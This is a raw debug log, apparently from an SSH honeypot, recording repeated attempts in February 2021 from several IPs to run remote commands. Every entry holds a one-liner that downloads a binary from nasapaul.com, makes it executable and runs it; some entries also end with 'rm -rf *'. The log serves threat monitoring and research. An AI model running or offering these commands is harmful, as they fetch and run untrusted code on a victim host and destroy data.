01:20:09.082 services ▶ DEBU 6ffb Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000dec60 {{0 0} [0xc0009c0a80] 0} 0xc000efac60 {0 0} 0xc000efad20 0xc000efade0 0xc000033680 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efaea0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efae40) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000483600 {0 0 0 <nil> <nil>} 824633931568}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000033740 0xc0011ffdc0 0xc0011ffdc0 false}) %!s(*ssh.buffer=&{0xc000033780 0xc0011ffe00 0xc0011ffe00 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:20:09.082395995 +0000 UTC m=+1478197.363791790, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=45116, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhri0k9kn000dnaogg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
01:20:13.461 services ▶ DEBU 7004 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000e52580 {{0 0} [0xc0009c0d80] 0} 0xc00654ba40 {0 0} 0xc00654baa0 0xc00654bb00 0xc000e9cb80 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb620) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb5c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc006614458 {0 0 0 <nil> <nil>} 824633932592}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000033b40 0xc00657c520 0xc00657c520 false}) %!s(*ssh.buffer=&{0xc000033b80 0xc00657c560 0xc00657c560 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:20:13.461984395 +0000 UTC m=+1478201.743380174, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=60602, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrj0k9kn000dnaohg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
01:20:38.877 services ▶ DEBU 7009 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0065e4000] 0} 0xc0011d66c0 {0 0} 0xc0011d6840 0xc0011d69c0 0xc000032180 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa600) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa4e0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0066146e0 {0 0 0 <nil> <nil>} 824649040368}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c200 0xc000a99520 0xc000a99520 false}) %!s(*ssh.buffer=&{0xc000e9c240 0xc00118b860 0xc00118b860 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:20:38.878458257 +0000 UTC m=+1478227.159854068, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=51840, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrpgk9kn000dnaoi0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
01:20:47.576 services ▶ DEBU 7012 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000c02160 {{0 0} [0xc0000ba240] 0} 0xc000efade0 {0 0} 0xc000efae40 0xc000efaea0 0xc000e9c440 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7020) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6fc0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001149070 {0 0 0 <nil> <nil>} 824633927664}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032800 0xc00013a4a0 0xc00013a4a0 false}) %!s(*ssh.buffer=&{0xc000032840 0xc0001504c0 0xc0001504c0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:20:47.57702981 +0000 UTC m=+1478235.858425678, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=60390, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrrgk9kn000dnaoj0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
01:21:17.425 services ▶ DEBU 701b Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000c02420 {{0 0} [0xc0000ba540] 0} 0xc000efb260 {0 0} 0xc000efb2c0 0xc000efb380 0xc000e9c600 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7800) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d77a0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001149b60 {0 0 0 <nil> <nil>} 824633929072}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032d80 0xc0011fe600 0xc0011fe600 false}) %!s(*ssh.buffer=&{0xc000032dc0 0xc0011fe640 0xc0011fe640 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:21:17.426345812 +0000 UTC m=+1478265.707741607, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=36570, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhs30k9kn000dnaok0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
01:21:21.571 services ▶ DEBU 7024 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000c026e0 {{0 0} [0xc0065e4780] 0} 0xc0011d7f20 {0 0} 0xc0011d7f80 0xc00006a1e0 0xc000033180 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb680) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb620) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004322e8 {0 0 0 <nil> <nil>} 824649042416}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9ca00 0xc000e98bc0 0xc000e98bc0 false}) %!s(*ssh.buffer=&{0xc000e9ca40 0xc000e98c20 0xc000e98c20 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:21:21.572265481 +0000 UTC m=+1478269.853661273, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=51932, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhs40k9kn000dnaol0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
03:21:26.145 services ▶ DEBU 71b0 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000a58000] 0} 0xc000e95440 {0 0} 0xc000e955c0 0xc000e956e0 0xc000032580 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000432730 {0 0 0 <nil> <nil>} 824649040304}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c1c0 0xc0011fe160 0xc0011fe160 false}) %!s(*ssh.buffer=&{0xc000e9c200 0xc0011fe1a0 0xc0011fe1a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 03:21:26.145657772 +0000 UTC m=+1485474.427053559, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=178.62.231.95, source-port=46912, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0ljkd8k9kn000dnaq70, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
03:25:25.338 services ▶ DEBU 7219 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de580 {{0 0} [0xc00082e300] 0} 0xc000e95f20 {0 0} 0xc000efa000 0xc000efa0c0 0xc000e9c4c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6540) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6480) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e919f0 {0 0 0 <nil> <nil>} 824633927280}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032680 0xc000e98b20 0xc000e98b20 false}) %!s(*ssh.buffer=&{0xc0000326c0 0xc000e98b60 0xc000e98b60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 03:25:25.338714627 +0000 UTC m=+1485713.620110430, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=178.62.231.95, source-port=45366, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0ljm90k9kn000dnaqk0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
05:05:34.106 services ▶ DEBU 7278 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc000efa240 {0 0} 0xc000efa2a0 0xc000efa360 0xc000032300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6b40) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6a20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000432368 {0 0 0 <nil> <nil>} 824649040304}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c1c0 0xc00118bac0 0xc00118bac0 false}) %!s(*ssh.buffer=&{0xc000e9c200 0xc00118bb00 0xc00118bb00 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf * | |
services > ssh > category=ssh, date=2021-02-16 05:05:34.107143848 +0000 UTC m=+1491722.388539632, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=52.152.130.178, source-port=34908, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0ll578k9kn000dnar00, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
05:13:25.955 services ▶ DEBU 72b1 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc000efa000 {0 0} 0xc000efa0c0 0xc000efa180 0xc000e9c000 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6c60) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6ba0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0000391d0 {0 0 0 <nil> <nil>} 824633927152}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032600 0xc000e98580 0xc000e98580 false}) %!s(*ssh.buffer=&{0xc000032640 0xc000e985c0 0xc000e985c0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf * | |
services > ssh > category=ssh, date=2021-02-16 05:13:25.956122125 +0000 UTC m=+1492194.237517907, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=52.152.130.178, source-port=34144, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0ll8t8k9kn000dnar70, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
05:26:25.548 services ▶ DEBU 72ec Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000e1e000] 0} 0xc000efa600 {0 0} 0xc000efa660 0xc000efa6c0 0xc000e9c0c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d66c0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6660) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482c40 {0 0 0 <nil> <nil>} 824633927280}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032680 0xc0011fe320 0xc0011fe320 false}) %!s(*ssh.buffer=&{0xc0000326c0 0xc0011fe360 0xc0011fe360 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 05:26:25.548971359 +0000 UTC m=+1492973.830367175, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=58506, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0llf00k9kn000dnareg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
05:30:50.956 services ▶ DEBU 734d Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000deb00 {{0 0} [0xc0000bacc0] 0} 0xc0011d72c0 {0 0} 0xc0011d7320 0xc0011d73e0 0xc000032c00 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d74a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7440) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000483070 {0 0 0 <nil> <nil>} 824633928880}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032cc0 0xc0011ffb20 0xc0011ffb20 false}) %!s(*ssh.buffer=&{0xc000032d00 0xc0011ffb60 0xc0011ffb60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 05:30:50.957196197 +0000 UTC m=+1493239.238591988, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=38832, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0llh2gk9kn000dnarqg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
06:48:38.110 services ▶ DEBU 7399 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc000e952c0 {0 0} 0xc000e95440 0xc000e955c0 0xc000032640 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d66c0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6660) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004829c0 {0 0 0 <nil> <nil>} 824649040240}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c180 0xc000e984e0 0xc000e984e0 false}) %!s(*ssh.buffer=&{0xc000e9c1c0 0xc000e98520 0xc000e98520 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 06:48:38.111267801 +0000 UTC m=+1497906.392663578, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.172.24.118, source-port=55164, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lmlh8k9kn000dnas30, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
19:35:35.324 services ▶ DEBU 77d9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc0011d6540 {0 0} 0xc0011d65a0 0xc0011d6600 0xc000032100 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efafc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efaf60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000432a18 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc000e985c0 0xc000e985c0 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc000e98600 0xc000e98600 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 19:35:35.32485359 +0000 UTC m=+1543923.606249369, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=44330, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0m1t1gk9kn000dnb0d0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
